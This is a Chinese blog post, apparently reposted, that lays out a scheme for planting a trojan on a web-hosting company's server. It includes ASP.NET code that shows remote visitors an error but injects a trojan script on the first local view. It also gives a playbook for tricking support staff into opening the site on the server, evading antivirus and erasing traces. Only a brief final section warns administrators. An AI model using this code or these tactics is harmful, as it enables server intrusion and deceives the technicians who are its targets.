asp.net 利用網(wǎng)頁掛馬拿服務(wù)器的一種設(shè)想

發(fā)布時間：2009-08-07 01:20:57 作者：佚名

客戶的網(wǎng)站經(jīng)常被掛馬，不勝其煩。今天在無聊清理代碼的時候，靈機(jī)一動，想到一個拿服務(wù)器權(quán)限的方法(先鄙視一下自己，沒想到防止掛馬的方法，咋先想到害人的方法了捏)。當(dāng)然此方法純屬胡思亂想，未曾實施過，不保證真正有效。

步驟如下：
準(zhǔn)備工作
1.做好遠(yuǎn)控木馬，做好免殺，找個網(wǎng)馬生成器生成網(wǎng)馬。然后傳到一個空間，并做好相應(yīng)的加密過的JS引用文件。
2.找一套正常的網(wǎng)站源碼（大家做過的網(wǎng)站隨便找一個就ok了），加一段代碼，讓它只能在本地訪問時正常顯示，遠(yuǎn)程訪問時出錯。（很關(guān)鍵，大家都是程序員，這個功能也不難）。然后通過cs代碼往前臺頁面插入木馬js文件，注意，判斷一下，只在本地瀏覽且是第一次瀏覽時插入，其他情況不插入，當(dāng)然，為了成功后我們能知道，這里也可以插入一段通知的代碼，比如往我們心想發(fā)一封成功的e-mail。
示例代碼

復(fù)制代碼

代碼如下:

if(Request.IsLocal)//判斷是否本機(jī)訪問，當(dāng)然你可以改為更好的判斷方法
{
if(ConfigurationManager.AppSettings["sitecode"].Equals("0"))//是否第一次訪問的標(biāo)志，這里為了簡單，使用的配置文件，你可以修改為其他更隱蔽的方法
{
Configuration config = ConfigurationManager.OpenExeConfiguration(ConfigurationUserLevel.None);
config.AppSettings.Settings["sitecode"].Value="1";
config.Save();
Response.Write("<script language=\"javascript\" src=\"木馬js文件路徑\" ></script>");
//發(fā)送成功提示的代碼
}
//正常執(zhí)行的代碼
}
else

3.為了安全，把整站編譯一下，否則這些小動作別人一看代碼就知道了。
開始實施
1.找到下手的虛擬主機(jī)服務(wù)器商，先大致掃一下服務(wù)器，看一下安全，性能等等，找到自己滿意的。
2.和他們聯(lián)系，說是買空間，要求試用。
3.把準(zhǔn)備好的網(wǎng)站傳上去。然后找他們客服（裝模作樣幾分鐘再去找，別傳上立刻去找，以免引起懷疑），說網(wǎng)站在你本地測試一切正常，傳到他們服務(wù)器上就打不開了。讓他們給看看怎么回事。
等待處理
1.他們技術(shù)會先在他自己機(jī)器上輸一下網(wǎng)址試試，以測試是不是真的打不開，或者是在打不開的情況下報的是什么錯誤。當(dāng)然，在我們程序的控制下，他最終只能看到一個完美的錯誤頁面。
2.他也許會多找?guī)着_機(jī)器試試，但是等他看過五六個錯誤頁面后，最終還是要登到服務(wù)器上查看。他會查看一下iis的設(shè)置，發(fā)現(xiàn)沒問題。
3.他也會查看一下你網(wǎng)站的源碼，當(dāng)然，在編譯過的情況下，他什么也發(fā)現(xiàn)不了。
4.這時，他很有可能會在服務(wù)器運(yùn)行一下你的網(wǎng)站，這時，程序檢測到是本地瀏覽，于是正常顯示，同時程序檢測到是第一次運(yùn)行，于是插入木馬js。于是我們的木馬就成功植入了他們服務(wù)器，如果你寫了提示代碼，這時你會收到一封成功的e-mail。這時你不要干等，要在溝通的過程中引導(dǎo)他們在服務(wù)器上運(yùn)行你的網(wǎng)站。
擦屁股
1.他們無論怎么檢測設(shè)置，都會發(fā)現(xiàn)網(wǎng)站在服務(wù)器能打開而本地打不開的事實。這時你要趕快刪掉上傳上去的文件，并大罵他們垃圾服務(wù)器垃圾空間后，悠然撤離。
2.如果你感覺這么做對不起他們的熱情服務(wù)，會良心不安的話。那還有一種處理方法。首先你做準(zhǔn)備工作的時候，把代碼改一下，修改為只有在經(jīng)過一次本地瀏覽后，遠(yuǎn)程才能瀏覽。這樣他們技術(shù)員在服務(wù)器上瀏覽一次網(wǎng)站并種植木馬后，遠(yuǎn)程就能訪問了。
示例代碼

復(fù)制代碼

代碼如下:

if(Request.IsLocal)//判斷是否本機(jī)訪問，當(dāng)然你可以改為更好的判斷方法
{
if(ConfigurationManager.AppSettings["sitecode"].Equals("0"))//是否第一次訪問的標(biāo)志，這里為了簡單，使用的配置文件，你可以修改為其他更隱蔽的方法
{
Configuration config = ConfigurationManager.OpenExeConfiguration(ConfigurationUserLevel.None);
config.AppSettings.Settings["sitecode"].Value="1";
config.Save();
Response.Write("<script language=\"javascript\" src=\"木馬js文件路徑\" ></script>");
//發(fā)送成功提示的代碼
}
}
if(ConfigurationManager.AppSettings["sitecode"].Equals("0"))
Response.Close();
//正常執(zhí)行的代碼

這時你大大地夸贊他們一番，然后自己找個理由最終不買他們空間。
3.最終不管結(jié)尾如何，你肉雞到手，至于怎么玩，就看你自己了。當(dāng)然你能把抓到的肉雞和我共享一下，那就更好了。

問題與處理方法
1.他們空間不支持.NET。
你干脆買塊豆腐撞死算了，不支持你還找他們，能怪誰啊，換支持的空間。
2.他們空間不準(zhǔn)試用。
兩種選擇：1.放棄，換一個。2.買一個最便宜的吧。
3.他們不在服務(wù)器運(yùn)行站點。
自己想辦法忽悠引導(dǎo)他們運(yùn)行。比如多次強(qiáng)調(diào)自己本機(jī)運(yùn)行沒問題，他們在心理暗示下，很有可能也在"本機(jī)"----即服務(wù)器上運(yùn)行一下看有沒有問題。當(dāng)然，還有更多絕妙的主意你可以自己去想。如果他們是比較嚴(yán)格正規(guī)的公司，絕對禁止在服務(wù)器打開任何網(wǎng)站，或者是他們技術(shù)比較小心謹(jǐn)慎，即使懷疑你代碼有問題，他也只會把網(wǎng)站代碼下載下來在自己機(jī)器上運(yùn)行。那沒辦法了。反正國內(nèi)賣空間的小公司一抓一大把，不會都這么嚴(yán)格和正規(guī)，換一家吧。
4.掛的代碼被發(fā)現(xiàn)，或者木馬運(yùn)行了，但是被殺掉了。
這個沒啥說的，基本功問題，吸取教訓(xùn)，做好免殺，換一家搞。
5.跟他們一反應(yīng)問題，他們立即操起了Reflector，一下找到了你做的手腳。
這個可能性比較小，處理問題有個次序，他們一般不會先檢查代碼，這樣你才有擦屁股逃跑的可能。如果你真遇到這么個不按常理出牌的哥們，還等啥，趕快跑路吧。另外別忘了去買張彩票，中500w可比掛馬成功的感覺要好多了。
如果真要防止的話，提前加密混淆吧，具體怎么辦，園子里自己"找找看"。
6.他們服務(wù)太垃圾，根本不鳥你，或者應(yīng)承了下來，就是不去處理，或者甩一句“你代碼問題，服務(wù)器沒問題”就不管了。
你要知道，這種情況在國內(nèi)是正常的，所以不要生氣，換一家吧。
7.雖然肉雞抓到了，但是也被他們找到是代碼的問題了。
這是因為你沒擦屁股或者沒擦好。最后撤離時要果斷、迅速，不要猶豫，不要磨磨蹭蹭。因為他們排除各種原因后，遲早會把矛頭指到你的代碼上，所以一等他們運(yùn)行過網(wǎng)站，趕快撤離，別給他們這個機(jī)會。
總之，成功幾率相當(dāng)大，因為這個世界上隨意的人永遠(yuǎn)比認(rèn)真的人多。懶人永遠(yuǎn)比勤快的人多。
對管理員的警示
你并不能知道客戶提的要求是正常的還是惡意的。你所能做的就是堅持這個原則：在任何情況下都不能在服務(wù)器上瀏覽任何網(wǎng)站。如果有困難，至少要做到：在服務(wù)器上不能打開任何不受信任的網(wǎng)站（你iis里的站點，自然都在不信任列表里）。
如此，不管敵人多狡猾，都拿你沒辦法。